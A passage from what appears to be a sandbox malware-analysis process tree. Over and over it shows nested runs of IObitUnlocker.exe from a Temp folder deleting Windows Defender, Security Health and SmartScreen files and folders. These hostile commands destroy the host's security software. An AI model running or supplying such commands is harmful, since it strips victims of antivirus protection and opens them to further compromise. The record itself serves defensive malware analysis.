Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:10460
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:11300
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:11556
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:11808
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:12060
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:10392
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:11384
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:11772
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:11912
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
